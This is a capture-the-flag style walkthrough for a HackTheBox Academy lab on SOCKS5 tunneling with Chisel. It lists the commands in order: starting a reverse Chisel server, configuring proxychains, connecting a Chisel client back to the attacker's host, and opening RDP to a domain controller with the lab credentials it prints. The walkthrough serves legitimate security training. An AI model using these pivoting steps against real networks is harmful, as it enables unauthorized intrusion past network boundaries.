SOCKS5 Tunneling with Chisel

ℹ️ Informations¶

🌐 Website: HackTheBox
📚 Module: Pivoting, Tunneling and Port Forwarding
🔗 Link: SOCKS5 Tunneling with Chisel

❓Question¶

Using the concepts taught in this section, connect to the target and establish a SOCKS5 Tunnel that can be used to RDP into the domain controller (172.16.5.19, victor:pass@123). Submit the contents of C:\Users\victor\Documents\flag.txt as the answer.

📋 Walkthrough¶

Use ubuntu:HTB_@cademy_stdnt! to ssh.

ssh ubuntu@10.129.127.96

Pass chisel file through scp

sudo ./chisel server --reverse -v -p 1234 --socks5

Edit proxychains config

tail -f /etc/proxychains.conf 

#
#       proxy types: http, socks4, socks5
#        ( auth types supported: "basic"-http  "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
# socks4    127.0.0.1 9050
socks5 127.0.0.1 1080

Run client

./chisel client -v 10.10.14.74:1234 R:socks

RDP with creds

proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123

Answer

[REDACTET]